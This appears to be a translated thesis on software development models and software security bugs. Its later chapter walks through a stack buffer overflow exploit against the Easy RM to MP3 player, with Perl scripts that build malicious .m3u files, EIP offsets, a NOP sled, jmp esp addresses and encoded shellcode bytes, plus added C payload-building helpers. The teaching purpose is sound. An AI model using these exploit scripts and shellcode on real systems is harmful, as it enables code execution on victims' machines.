TABLE OF CONTENTS (entries recovered from the extraction; page numbers dropped)

Chapter I. Overview of the software development process
  1.1 (1.1.1; 1.1.2 The software development process)
  1.2 (1.2.1; 1.2.2)
  1.3 Software development models
    1.3.1 The Waterfall model
    1.3.2 The V model
    1.3.3 The Prototype model
    1.3.4 to 1.3.6 (titles not recovered)
    1.3.7 The Spiral model
  Conclusion of Chapter I
Chapter II. Software security bugs and some common software security bugs
  2.1 (2.1.1; 2.1.2)
  2.2 (2.2.1; 2.2.2)
  2.3 (title not recovered)
  2.4 Double free bugs
  Conclusion of Chapter II
Chapter III. Finding and detecting bugs
  3.1 (3.1.1; 3.1.2 The tester's role; 3.1.3 The hacker's role)
  3.2 Exploitation steps (3.2.1 to 3.2.5)
  3.3 Jumping to the shellcode (3.3.1 jump/call register; 3.3.2 pop return; 3.3.3 push return; 3.3.4 (title not recovered); 3.3.5 blind return; 3.3.6 Dealing with small buffers; 3.3.7 (title not recovered); 3.3.8 Some other techniques)
  3.4 Shellcode backdoor
Appendices 1 to 5
LIST OF ABBREVIATIONS

Abbreviation   Term                                   Meaning
SEP            (expansion not recovered)
ID             Identifier                             identifier
CSDL           Cơ sở dữ liệu                          database
SRS            Software Requirements Specification    software requirements specification
GUI            Graphical User Interface               graphical user interface
RUP            Rational Unified Process               a software development process
RAD            Rapid Application Development          a software development model
OS             Operating System                       operating system
LIFO           Last In, First Out                     last in, first out
ESP            Extended Stack Pointer                 stack pointer register
EBP            Extended Base Pointer                  base (frame) pointer register
EIP            Extended Instruction Pointer           instruction pointer register
NOP            No Operation Performed                 no-operation instruction (0x90)
DLL            Dynamic Link Library                   dynamic link library
CPU            Central Processing Unit                central processing unit
SEH            Structured Exception Handling          structured exception handling
LIST OF TABLES
Table 1. Functions that cause bugs (and what to use instead)
Table 2. Constructs that cause bugs
Table 3. Test cases
Table 4. Opcodes of jump and call instructions
LIST OF FIGURES (captions given where they were recovered)
Figure 1.1  Waterfall model
Figure 1.2  V model
Figure 1.3  Prototype model
Figure 1.4  Evolutionary model
Figure 1.5  Iterative and incremental model
Figure 1.6  (caption not recovered)
Figure 1.7  Spiral model
Figure 2.1  Stack
Figure 2.2  Push
Figure 2.3  Pop
Figure 2.4  Peek
Figure 2.5  Stack frame created
Figures 2.6 to 2.8  (captions not recovered)
Figure 2.9  ESP points to 0022FF5C
Figures 2.10 to 2.12  (captions not recovered)
Figure 2.13  ESP points to the start of the string
Figure 2.14, 3.1, 3.2  (captions not recovered)
Figure 3.3  The application crashes
Figures 3.4 to 3.7  (captions not recovered)
Figure 3.8  Contents of ESP
Figures 3.9, 3.10  (captions not recovered)
Figure 3.11  ESP holds the address 000ff730
Figure 3.12  (caption not recovered)
Figure 3.13  ESP starts at the 5th character
Figures 3.14 to 3.20  (captions not recovered)
Figure 3.21  Some opcodes
Figures 3.22, 3.23  (captions not recovered)
Figure 3.24  Large memory region filled with A's
Figure 3.25  000ff849 is part of the sample buffer
Figure 3.26  (caption not recovered)
Appendix figure
PREFACE

Today the development of information technology occupies an ever more important place in every area of life. The explosion of science and technology in general, and of information technology in particular, brings people many benefits: it shortens geographical distances, increases productivity, and saves time and cost at work.

With information technology developing as strongly as it does today, the computer has become an essential tool for everyone. Every area of life and every profession involves computers, and working with a computer means working with software, which has become an indispensable part of everyone's work. The rapid growth of software engineering has produced countless software products and tools serving every human need. Software brings enormous benefits and solves many problems that people previously could not solve. But alongside those benefits, software also brings no small number of risks, and these risks come from security vulnerabilities in the software in use.

What are these security vulnerabilities? Why do they appear? How are they exploited? Many people are trying to answer these questions. Understanding software security vulnerabilities is an extremely important problem, and one that consumes no small part of the effort of software developers around the world.

The graduation thesis "Research on techniques for finding and exploiting software security vulnerabilities" is organised in three chapters:

Chapter I. Overview of the software development process
  General theory of software
  Software development processes
Chapter II. Common software security bugs
  The concepts of software bugs and software security bugs
  [...]

1.1.1. (title not recovered)
[...]
Software performs its functions by issuing instructions directly to the hardware, or by providing data that serves other programs or software.
Software is an abstract concept: it cannot be touched or seen, and it needs hardware in order to execute.
1.1.2. The software development process

A process can be understood as the method for carrying out work or producing a product. Likewise, a software development process is the method for developing, or producing, a software product.

A process usually consists of the following basic elements:
- Procedures
- Forms/templates
- Supporting tools

with the following main groups of work products:
- Product specification: a document describing the software in detail, which serves as the basis for the software design.
- Work plan: a document describing in detail the work to be done during software development.
- Software design documents: documents on the software structure, data flow diagrams, ...
- Test documents: detailed documents for the testing process, including:
  - Test plan
1.3. Software development models
[...]
... so that the planning of system-wide testing can be carried out in parallel with system analysis and design.
Advantages: testing activities are emphasised and run in parallel with the activities related to requirements specification and design. In other words, this model encourages test-planning activities to start early in the development cycle, rather than waiting until the end of the implementation phase.
Disadvantages: the same as the waterfall model.
Applications: see the waterfall model.
1.3.3. The Prototype model
[...]
The difference between the incremental and the iterative model can be understood simply as follows (relative to the product ...):
- Incremental model: adds functionality to the product (see Figure 1.6).
[...]
Disadvantages: it is hard to keep consistency between components developed by different teams. It is not suitable for applications that demand high performance, and it usually depends on the support of the development environment and of a high-level language.
Applications: information management systems, such as GUI- and database-based applications, where tool support or a high-level language is available and the system has no strict performance requirements.
1.3.7. The Spiral model
This model was built by Barry Boehm. It focuses on risk analysis and on planning how to resolve risks, through a series of successive sub-cycles based on the nature of the iterative model. In this model, the analysis and resolution of high-risk problems concentrates on the design of each specific aspect rather than on handling problems in a general way.
[...] the next iteration.
Advantages:
- Risk analysis and evaluation becomes an essential part of every turn of the spiral, increasing the project's reliability.
- It combines the best properties of the waterfall and evolutionary models.
- It allows changes according to the actual conditions of the project at each turn of the spiral.
- It is the most general model: every other model can be seen as a realisation of this general model, or the model can be seen as a synthesis of the others. In particular it is applied not only to software development but also to hardware development.
Disadvantages: complex, and unsuitable for small projects with little risk. It requires good risk-analysis skills.
Applications: large projects with many risks, or whose success has no firm guarantee; projects that require much computation and processing, such as decision-support systems; and teams capable of risk analysis.

Conclusion of Chapter I
Chapter I presented the concept of software and of the software development process; the basic elements of a software development process; the documents produced during development and the components that make up a software product; and the software development models, together with their advantages, disadvantages and applications in software development.
This chapter gives an initial overview of software and of developing a software product. The next chapter examines software security bugs and some common software security bugs.
int main(int argc, char **argv)
{
    do_something(argv[1]);
}
The application takes one argument (argv[1]) and passes it to the function do_something(). In this function the argument is copied into a local variable with a maximum size of 128 bytes. So if the argument is longer than 127 bytes (plus one NULL byte terminating the string), the buffer can overflow.

When do_something() is called from main(), the following happens:
- A stack frame is created, with the top of the stack holding the parent stack. The stack pointer (ESP) points to the highest address of the newly created stack; this is the top of the stack.
- Next, the function prologue executes. Essentially, the frame pointer register (EBP) is placed on the stack so that it can be restored when the function returns. The instruction that saves the frame pointer is `push ebp`, and ESP decreases by 4 bytes again.
Disassembly of do_something() (listing reconstructed; the addresses and opcodes that the extraction dropped are derived from the instruction lengths of the surviving ones):

00401290  /$ 55             PUSH EBP
00401291  |. 89E5           MOV EBP,ESP
00401293  |. 81EC 98000000  SUB ESP,98
00401299  |. 8B45 08        MOV EAX,DWORD PTR SS:[EBP+8]
0040129C  |. 894424 04      MOV DWORD PTR SS:[ESP+4],EAX   ; |
004012A0  |. 8D85 78FFFFFF  LEA EAX,DWORD PTR SS:[EBP-88]  ; |
004012A6  |. 890424         MOV DWORD PTR SS:[ESP],EAX     ; |
004012A9  |. E8 72050000    CALL strcpy                    ; \strcpy
004012AE  |. C9             LEAVE
004012AF  \. C3             RETN
The prologue is clearly visible: PUSH EBP and MOV EBP,ESP. Next you see space being allocated for the variable MyVar: SUB ESP,98. Then there are some MOV and LEA instructions (essentially setting up the parameters for the strcpy() call). They can be read as: take the pointer to argv[1] (which is at EBP+8) and copy it into EAX, then copy EAX into the argument slot at ESP+4.

In detail:
- PUSH EBP saves EBP; then MOV EBP,ESP makes ESP and EBP both point to the top of the stack, i.e. to the EBP value that was just pushed.
- SUB ESP,98 allocates a region of 152 bytes (0x98 in decimal).
- MOV EAX,DWORD PTR SS:[EBP+8]: EBP+8 holds the pointer to argv[1]. This copies the address of argv[1] into EAX. Note that an address is the size of one 32-bit register, 4 bytes.
- MOV DWORD PTR SS:[ESP+4],EAX copies EAX (the address of argv[1]) to ESP+4. Remember that after SUB ESP,98, ESP has moved down to the new top of the stack (as in the figure above) and no longer points to the same place as EBP. ESP+4 is the slot 4 bytes above the top of the stack (the stack grows from high addresses to low, so this is the second argument slot of the coming call). Those 4 bytes now hold the address of argv[1], the source for strcpy().
- LEA EAX,DWORD PTR SS:[EBP-88] stores the address EBP-0x88 into EAX.
- MOV DWORD PTR SS:[ESP],EAX writes that address to [ESP], the first argument slot. It points to EBP-0x88, the start of the buffer where strcpy() will store the contents of argv[1].
After this, LEAVE restores the saved EBP and RET pops the saved EIP, returning to main().

If there were no strcpy() in this function, the function would finish and unwind the stack. Essentially it would move ESP back to the saved ESP and then execute RET. RET in this case takes the pointer from [ESP] and jumps to it, returning to the main program at the point where do_something() was called. The epilogue is performed by LEAVE, which restores the frame pointer, and RET, which restores EIP. In our example, however, there is a strcpy().

This function reads data from the address given by its source argument and stores it at the destination buffer, copying everything up to and including the null byte (the string terminator). While copying, ESP itself does not move: strcpy() does not PUSH the data onto the stack, it reads one byte at a time and writes it by index (destination, destination+1, destination+2, ...). After the copy, [ESP] still holds the address of the start of the string.
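The walkthrough above can be checked against code. The following is an added example, not code from the thesis: it shows the do_something() pattern beside a bounded version, and turns the frame layout from the listing (buffer at EBP-0x88, saved EBP at [EBP], return address at [EBP+4]) into the number of bytes an argument must have to reach the saved EIP. The names `MYVAR_EBP_OFFSET`, `bounded_len` and the helper functions are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define MYVAR_SIZE 128          /* declared size of the local buffer in do_something() */
#define MYVAR_EBP_OFFSET 0x88   /* LEA EAX,[EBP-88]: where the compiler placed it */

/* The vulnerable pattern from the listing: strcpy() copies until the NUL
 * byte, ignoring the 128-byte buffer. Calling this with 128 bytes or more
 * corrupts the frame, so main() below never does. */
void do_something(const char *buffer)
{
    char myvar[MYVAR_SIZE];
    strcpy(myvar, buffer);
    printf("copied %zu bytes\n", strlen(myvar));
}

/* Length of s, never looking past `limit` bytes (strnlen is not ISO C,
 * so it is spelled out here). */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Hardened version: the copy is refused unless the string and its
 * terminator both fit. Returns 0 when copied, -1 when rejected. */
int do_something_safe(const char *buffer)
{
    char myvar[MYVAR_SIZE];
    size_t len = bounded_len(buffer, sizeof myvar);
    if (len >= sizeof myvar)      /* 128 payload bytes leave no room for the NUL */
        return -1;
    memcpy(myvar, buffer, len + 1);
    return 0;
}

/* Result of do_something_safe() on a string of n 'A's (n < 512). */
int safe_copy_of_length(size_t n)
{
    char s[512];
    if (n >= sizeof s) return -2;
    memset(s, 'A', n);
    s[n] = '\0';
    return do_something_safe(s);
}

/* Frame arithmetic from the listing. After `push ebp; mov ebp,esp` the
 * saved EBP is at [EBP] and the return address (saved EIP) at [EBP+4].
 * A buffer at EBP-offset reaches the saved EIP after offset+4 bytes:
 * 0x88 + 4 = 140 bytes for this binary. */
uint32_t bytes_to_saved_eip(uint32_t buffer_offset_from_ebp)
{
    return buffer_offset_from_ebp + 4;
}

/* Bytes between the declared end of the buffer and the saved EBP; here
 * the compiler left 0x88 - 128 = 8 bytes of padding. */
uint32_t padding_before_saved_ebp(uint32_t buffer_offset_from_ebp, uint32_t declared_size)
{
    return buffer_offset_from_ebp - declared_size;
}

int main(int argc, char **argv)
{
    const char *arg = argc > 1 ? argv[1] : "hello";
    printf("bounded copy: %s\n", do_something_safe(arg) == 0 ? "ok" : "rejected (too long)");
    printf("bytes to saved EIP for a buffer at [EBP-0x%x]: %u\n",
           MYVAR_EBP_OFFSET, bytes_to_saved_eip(MYVAR_EBP_OFFSET));
    printf("padding between myvar[128] and the saved EBP: %u\n",
           padding_before_saved_ebp(MYVAR_EBP_OFFSET, MYVAR_SIZE));
    return 0;
}
```

The 8 bytes of padding are why "longer than 127 bytes" corrupts the buffer but not yet the return address: the saved EIP is only overwritten once the argument reaches 140 bytes.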
The heap is used for dynamic memory allocation. In C [7], allocation and freeing are done through the functions malloc() and free(). When a program is loaded into memory, the heap segment lies before the stack segment [8].

Because the heap is used to store data and does not hold function return addresses the way the stack does, exploiting a heap buffer overflow is considerably harder than exploiting a stack buffer overflow. Nevertheless, a heap buffer overflow can still be exploited successfully in two ways:
- Modifying data: the attacker exploits the vulnerability by overwriting important data. This can crash the program or change values that can be exploited later (such as overwriting a user ID to gain extra access rights).
- Modifying objects: in many programming languages, such as C++ and Objective-C, objects placed on the heap contain tables of function pointers together with data. An attacker can therefore replace other data, or even replace the instance methods [9] of the object's class.
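Both cases can be made concrete with two adjacent objects. The following is an added example, not code from the thesis: object A (a user record) and object B (an object whose first field selects its method, standing in for the function-pointer slot described above) are laid out back to back in a byte array that plays the role of two neighbouring heap chunks, so the overwrite is defined behaviour and can be inspected. The struct layouts, field names, the `METHOD_*` selectors and the attacker input are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define NAME_SIZE 16
enum { METHOD_SAFE = 1, METHOD_PRIVILEGED = 2 };

/* Object A: a user record. Object B: an object whose first field selects
 * its method, the role a vtable/function pointer plays in C++. */
typedef struct { char name[NAME_SIZE]; uint32_t user_id; } user_t;
typedef struct { uint32_t method; uint32_t state; } object_t;

/* A and B allocated back to back, as adjacent heap chunks would be. */
typedef struct { unsigned char bytes[sizeof(user_t) + sizeof(object_t)]; } fake_heap_t;

static void heap_init(fake_heap_t *h)
{
    user_t a = { "guest", 1000 };
    object_t b = { METHOD_SAFE, 0 };
    memcpy(h->bytes, &a, sizeof a);
    memcpy(h->bytes + sizeof a, &b, sizeof b);
}

static uint32_t read_user_id(const fake_heap_t *h)
{
    user_t a; memcpy(&a, h->bytes, sizeof a); return a.user_id;
}
static uint32_t read_method(const fake_heap_t *h)
{
    object_t b; memcpy(&b, h->bytes + sizeof(user_t), sizeof b); return b.method;
}

/* Vulnerable: copies whatever length the caller supplies into A.name. */
static void set_name_unchecked(fake_heap_t *h, const unsigned char *src, size_t n)
{
    memcpy(h->bytes, src, n);
}

/* Hardened: the copy is bounded by the field and always terminated. */
static int set_name_checked(fake_heap_t *h, const unsigned char *src, size_t n)
{
    if (n >= NAME_SIZE) return -1;
    memcpy(h->bytes, src, n);
    h->bytes[n] = '\0';
    return 0;
}

/* Constructed attacker input: fill the name, then overwrite A.user_id with 0
 * ("modify data") and B.method with the privileged selector ("modify object"). */
static size_t build_overflow(unsigned char *out)
{
    uint32_t zero = 0, priv = METHOD_PRIVILEGED;
    memset(out, 'A', NAME_SIZE);
    memcpy(out + NAME_SIZE, &zero, sizeof zero);
    memcpy(out + NAME_SIZE + 4, &priv, sizeof priv);
    return NAME_SIZE + 8;
}

uint32_t user_id_after_unchecked_overflow(void)
{
    fake_heap_t h; unsigned char in[64]; size_t n = build_overflow(in);
    heap_init(&h); set_name_unchecked(&h, in, n);
    return read_user_id(&h);                 /* 0: the guest became id 0 */
}
uint32_t method_after_unchecked_overflow(void)
{
    fake_heap_t h; unsigned char in[64]; size_t n = build_overflow(in);
    heap_init(&h); set_name_unchecked(&h, in, n);
    return read_method(&h);                  /* METHOD_PRIVILEGED */
}
int checked_write_result(void)
{
    fake_heap_t h; unsigned char in[64]; size_t n = build_overflow(in);
    heap_init(&h);
    return set_name_checked(&h, in, n);      /* -1: rejected */
}
uint32_t method_after_checked_write(void)
{
    fake_heap_t h; unsigned char in[64]; size_t n = build_overflow(in);
    heap_init(&h); set_name_checked(&h, in, n);
    return read_method(&h);                  /* still METHOD_SAFE */
}

int main(void)
{
    printf("unchecked: user_id=%u method=%u\n",
           user_id_after_unchecked_overflow(), method_after_unchecked_overflow());
    printf("checked:   result=%d method=%u\n",
           checked_write_result(), method_after_checked_write());
    return 0;
}
```

On a real heap the distance between A.name and B.method also depends on the allocator's chunk headers, which is part of what makes heap exploitation harder than the stack case.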
2.4. DOUBLE FREE BUGS
[...]

Conclusion of Chapter II
Chapter II presented the concepts of software bugs and software security bugs, and examined some common software security bugs: stack buffer overflows, heap buffer overflows and double free bugs.
We concentrated mainly on analysing the stack buffer overflow, which is the most common and the easiest to exploit today. The key point of this bug is overwriting EIP so that control flow can be redirected to the code we want to execute. The next chapter studies how to find this bug and the steps to exploit it.
CHAPTER III. FINDING AND DETECTING BUGS

3.1.1. The programmer's role
[...]
Table 1. Dangerous functions and what to use instead

Function    Use instead
strcat      strlcat
strcpy      strlcpy
strncat     strlcat
strncpy     strlcpy
sprintf     snprintf
vsprintf    vsnprintf
gets        fgets

Table 2. Buffer-size constructs: hard-coded size versus named size

Hard-coded             Use instead
char buf[1024];        #define BUF_SIZE 1024
                       char buf[BUF_SIZE];

Computing the buffer size with sizeof() avoids more errors than hard-coding the number: if the buffer's size is later changed, a check written against the literal in the left column no longer matches the buffer and will itself cause a bug.

Another point to watch is the use of signed integers:
0x7fffffff = 2147483647, but
0x80000000 = -2147483648
so in a 32-bit int the expression 2147483647 + 1 does not give 2147483648 but wraps to -2147483648 (signed overflow, undefined in C, but this is what the hardware produces), and a length check that adds to a signed length can be bypassed.
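The two pitfalls above, the wrapping signed check and the hard-coded size that drifts away from its buffer, are shown in the following added example (not code from the thesis). The 32-bit wrap is emulated with unsigned arithmetic so that the demonstration is defined behaviour on any host; `naive_fits`, `safe_fits`, `small` and the other names are assumptions made for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define BUF_SIZE 1024
static char buf[BUF_SIZE];

/* Two's-complement wrap of a 32-bit add, emulated with unsigned arithmetic
 * (signed overflow is undefined in C; this is what the hardware produces). */
int32_t wrap32_add(int32_t a, int32_t b)
{
    return (int32_t)((uint32_t)a + (uint32_t)b);
}

/* The naive check, as commonly written: "if (len + 1 > BUF_SIZE) reject".
 * With len = INT32_MAX the addition wraps to INT32_MIN, the comparison is
 * false, and the copy goes ahead. A negative len slips through the same way
 * and becomes a huge size_t at the memcpy. Returns 1 when it would accept. */
int naive_fits(int32_t len)
{
    return wrap32_add(len, 1) > (int32_t)BUF_SIZE ? 0 : 1;
}

/* Correct check: unsigned length compared against sizeof the buffer,
 * leaving room for the terminator, with no addition that can wrap. */
int safe_fits(size_t len)
{
    return len < sizeof buf;
}

/* Why sizeof beats a literal: this second buffer was shrunk to 512 bytes,
 * but a check copied from buf's code still says 1024. */
#define SMALL_SIZE 512
static char small[SMALL_SIZE];

int hardcoded_fits_small(size_t len) { return len < 1024; }          /* stale literal */
int sizeof_fits_small(size_t len)    { return len < sizeof small; }  /* follows the declaration */

int main(void)
{
    buf[0] = small[0] = '\0';
    printf("2147483647 + 1 wraps to %d\n", wrap32_add(INT32_MAX, 1));
    printf("naive check accepts INT32_MAX: %d, accepts -5: %d, accepts 2000: %d\n",
           naive_fits(INT32_MAX), naive_fits(-5), naive_fits(2000));
    printf("safe check accepts 1023: %d, 1024: %d, INT32_MAX: %d\n",
           safe_fits(1023), safe_fits(1024), safe_fits((size_t)INT32_MAX));
    printf("600 bytes into small[512]: hard-coded says %d, sizeof says %d\n",
           hardcoded_fits_small(600), sizeof_fits_small(600));
    return 0;
}
```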
3.1.2. The tester's role
Testers find software bugs using test cases. A test case is a situation set up for the software that the tester can try directly on it.
Depending on the software, the tester uses different test cases, but in general they all test by feeding different values into the software's inputs and evaluating the outputs, checking whether the outputs are the expected results.
A concrete example is finding bugs in a login form with two input fields, username and password.
In this example the tester passes different values into the two fields and observes the results, for instance:

Table 3. Test cases for the login form

No.  Username                Password                Expected result
1    (none)                  all cases               Login fails
2    all cases               (none)                  Login fails
3    numeric                 all cases               Login fails
4    special characters      all cases               Login fails
5    in the database         matching password       Login succeeds
6    in the database         (cell not recovered)    Login fails
7    (cell not recovered)    all cases               Login fails
3.1.3. The hacker's role
[...] So if we can make the application run our shellcode, we can call it an exploit. In most cases this pointer is referenced by the EIP register. The register is 4 bytes long, so if you can change these 4 bytes you control the application and the computer running it.

3.2. EXPLOITATION STEPS
In this part we look mainly at the steps for exploiting a stack buffer overflow. There are usually 5 steps to exploiting this kind of software vulnerability; each is detailed below.

3.2.1. Attach the program to a debugger [13]
To see the state of the stack (and the values of the registers, such as the stack pointer and the instruction pointer) we need to attach a debugger to the application, so that we can see what happens while it runs (and especially when it dies). There are many debuggers for this purpose, among them WinDbg and Immunity Debugger.
Now we start with the example from the part on finding stack buffer overflows:
Run Easy RM to MP3 and open the file crash.m3u once more. The application crashes again, and this time the debugger takes over.
Figure 3.7: Contents of the buffer after Easy RM to MP3 runs
my $file = "crash25000.m3u";
my $junk = "\x41" x 25000;                    # 25000 'A's
my $junk2 = "put the 5000 characters here";   # replace with 5000 bytes of a unique pattern
open($FILE, ">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";
Create the .m3u file and open it with Easy RM to MP3. Wait for the application to die and look at the contents of EIP:
Create the file, open it, and observe ESP:
We need:
- a real shellcode
- [...] ESP points to 0x000ff730
Now let's do the simple case: overwrite EIP with 000ff730, then 25 NOPs [14] (\x90), then a break (\xcc), then 25 more NOPs. If this works, EIP jumps to 0x000ff730 and runs the NOPs until it hits the break.
my $file = "test1.m3u";
my $junk = "A" x 26094;                 # filler up to the saved EIP
my $eip = pack('V', 0x000ff730);        # little-endian DWORD written over EIP
my $shellcode = "\x90" x 25;            # NOP sled
$shellcode = $shellcode . "\xcc";       # int3 breakpoint
$shellcode = $shellcode . "\x90" x 25;
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
The application crashes. Looking at EIP, it points to 0x000ff730. But when we dump ESP, we do not see what we expected. One reason is visible in the address itself: 0x000ff730 packs to the bytes 30 f7 0f 00, and the trailing 0x00 terminates a string copy, so nothing after the EIP overwrite reaches the stack. A stack address is also not stable between runs. The next step therefore looks for an instruction that jumps to ESP instead of hard-coding a stack address.
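The Perl scripts above are the thesis's own; the following is an added example, not part of the thesis, that rebuilds the same .m3u payload in C and adds the two helpers a practitioner uses at this step: a cyclic pattern to put in place of "put the 5000 characters here", and the lookup that turns the DWORD seen in EIP at the crash back into a file offset (26094 here, from 25000 filler bytes plus the position in the pattern). `JUNK_LEN`, the function names and the 1094 sample position are assumptions made for the example.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define JUNK_LEN 26094u        /* bytes before the saved EIP in Easy RM to MP3, per the text */
#define PATTERN_PERIOD 20280u  /* 26*26*10 triples of 3 bytes: every 4-byte window is unique */

/* pack('V', x): little-endian DWORD, the order the CPU reads EIP in. */
void pack_le32(unsigned char out[4], uint32_t v)
{
    out[0] = (unsigned char)v;         out[1] = (unsigned char)(v >> 8);
    out[2] = (unsigned char)(v >> 16); out[3] = (unsigned char)(v >> 24);
}

uint32_t unpack_le32(const unsigned char in[4])
{
    return (uint32_t)in[0] | ((uint32_t)in[1] << 8) |
           ((uint32_t)in[2] << 16) | ((uint32_t)in[3] << 24);
}

/* Cyclic pattern "Aa0Aa1Aa2...Zz9": what goes in place of "put the 5000
 * characters here". Writes n bytes, returns n. */
size_t pattern_create(unsigned char *out, size_t n)
{
    size_t i = 0;
    for (int u = 'A'; i < n; u = (u == 'Z') ? 'A' : u + 1)
        for (int l = 'a'; l <= 'z' && i < n; l++)
            for (int d = '0'; d <= '9' && i < n; d++) {
                out[i++] = (unsigned char)u;
                if (i < n) out[i++] = (unsigned char)l;
                if (i < n) out[i++] = (unsigned char)d;
            }
    return i;
}

/* Position in the pattern of the 4 bytes now in EIP, or -1 if not from it. */
long pattern_offset(uint32_t eip_value)
{
    unsigned char pat[PATTERN_PERIOD + 3];
    pattern_create(pat, sizeof pat);
    for (size_t i = 0; i + 4 <= PATTERN_PERIOD; i++)
        if (unpack_le32(pat + i) == eip_value)
            return (long)i;
    return -1;
}

/* Offset of EIP in the file when the pattern followed prefix_len filler
 * bytes (25000 'A's in the crash25000 script): prefix + pattern position. */
long find_eip_offset(uint32_t eip_value, size_t prefix_len)
{
    long off = pattern_offset(eip_value);
    return off < 0 ? -1 : (long)prefix_len + off;
}

/* The DWORD a debugger would show in EIP if the overwrite landed at
 * pattern position i (used to check that the lookup round-trips). */
uint32_t pattern_dword_at(size_t i)
{
    unsigned char pat[PATTERN_PERIOD + 3];
    pattern_create(pat, sizeof pat);
    return unpack_le32(pat + i);
}

/* junk + packed EIP + shellcode: the layout of every script in this chapter. */
size_t build_payload(unsigned char *out, size_t cap, size_t junk_len, uint32_t eip,
                     const unsigned char *shellcode, size_t sc_len)
{
    if (cap < junk_len + 4 + sc_len) return 0;
    memset(out, 'A', junk_len);
    pack_le32(out + junk_len, eip);
    memcpy(out + junk_len + 4, shellcode, sc_len);
    return junk_len + 4 + sc_len;
}

/* The "simple case" from the text: EIP = 0x000ff730, 25 NOPs, int3, 25 NOPs. */
size_t build_simple_test_payload(unsigned char *out, size_t cap)
{
    unsigned char sled[51];
    memset(sled, 0x90, sizeof sled);
    sled[25] = 0xcc;
    return build_payload(out, cap, JUNK_LEN, 0x000ff730u, sled, sizeof sled);
}

/* 1 when the simple payload has the expected length and bytes. Note the
 * 0x00 at JUNK_LEN+3: a string copy stops there, which is why that test
 * never reached the NOPs. */
int simple_payload_is_well_formed(void)
{
    static unsigned char file[JUNK_LEN + 4 + 51];
    size_t n = build_simple_test_payload(file, sizeof file);
    return n == sizeof file && unpack_le32(file + JUNK_LEN) == 0x000ff730u &&
           file[JUNK_LEN + 3] == 0x00 && file[JUNK_LEN + 4] == 0x90 &&
           file[JUNK_LEN + 4 + 25] == 0xcc;
}

int main(void)
{
    static unsigned char file[JUNK_LEN + 4 + 51];
    size_t n = build_simple_test_payload(file, sizeof file);
    FILE *f = fopen("test1.m3u", "wb");
    if (f) { fwrite(file, 1, n, f); fclose(f); }
    printf("wrote %zu bytes, EIP slot = %08x\n", n, unpack_le32(file + JUNK_LEN));
    printf("EIP 0x%08x from the crash25000 pattern => file offset %ld\n",
           pattern_dword_at(1094), find_eip_offset(pattern_dword_at(1094), 25000));
    return 0;
}
```

With the pattern in place of the 5000 filler characters, the DWORD in EIP at the crash is looked up with find_eip_offset(); 25000 plus the pattern position gives the 26094 used by every later script.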
Jumping to ESP is a very common technique in Windows applications. In practice a Windows application uses one or more DLLs, and these DLLs contain a lot of code. Moreover, the addresses used by a DLL are static, as long as the module is loaded at its preferred base and is not relocated by ASLR. So if we can find a DLL containing an instruction that jumps to ESP, we can overwrite EIP with the address of that instruction.

First we need to find the opcodes [15] for jmp esp.
You can do this by starting Easy RM to MP3, then starting WinDbg and attaching it to Easy RM to MP3. Do nothing else with Easy RM to MP3. This lets WinDbg show which modules and DLLs Easy RM to MP3 has loaded.
ModLoad lines reported by WinDbg (excerpt; the extraction separated some address ranges from their module names, so they are listed in the order recovered):

C:\WINDOWS\system32\ole32.dll
Converter\MSRMfilter03.dll
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
C:\WINDOWS\system32\WS2HELP.dll
Converter\MSRMfilter01.dll
ModLoad: 01a90000 01b01000   Converter\MSRMCcodec00.dll
ModLoad: 00c80000 00c87000   Converter\MSRMCcodec01.dll
ModLoad: 01b10000 01fdd000   Converter\MSRMCcodec02.dll
ModLoad: 01fe0000 01ff1000
ModLoad: 77120000 771ab000
C:\WINDOWS\system32\MSVCIRT.dll
C:\WINDOWS\system32\OLEAUT32.dll
# (the start of this script, including the first lines of $shellcode, was not recovered)
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
First, turn off autopopup in the registry. Create the m3u file and open it with the application:
We have our first exploit.

Jumping to the shellcode is the most important part of exploiting a software bug; it decides whether the exploit succeeds. There are many ways to jump to the shellcode, and the right one depends on the specific case. In this part we go through the ways of jumping to shellcode one by one.

3.3.1. jump (or call) register
Jump (or call) a register that points directly to the shellcode. With this technique you use a register that holds the address of the shellcode and get that address into EIP: you look for the opcode of a jump or call to that register in the DLL files of the running application, and when you build the payload, instead of overwriting EIP with a memory address you overwrite it with the address of the "jmp register" instruction. Naturally this only works when the register holds an address pointing to the shellcode. This is the method we used in the previous part.

If a register holds an address pointing directly to the shellcode, you can use call reg or jmp reg to go straight to it. In other words, if ESP points directly at the shellcode (so the first byte of the shellcode is the first byte at ESP), you can overwrite EIP with the address of a "call esp" instruction and the shellcode will execute. This works with every register, and kernel32.dll contains many addresses with call reg.

Example: suppose ESP points directly to the shellcode. First find an opcode for call esp, using findjmp:

findjmp.exe kernel32.dll esp
0x7C836A08  call esp
0x7C874413  jmp esp
Finished Scanning kernel32.dll for code useable with the esp register
Found 2 usable addresses

Next we overwrite EIP with the address 0x7C836A08.
In the earlier Easy RM to MP3 example we learned that ESP can be made to point at the shellcode by adding 4 characters between EIP and ESP, so the exploit becomes:
my $file = "test1.m3u";
my $junk = "A" x 26094;
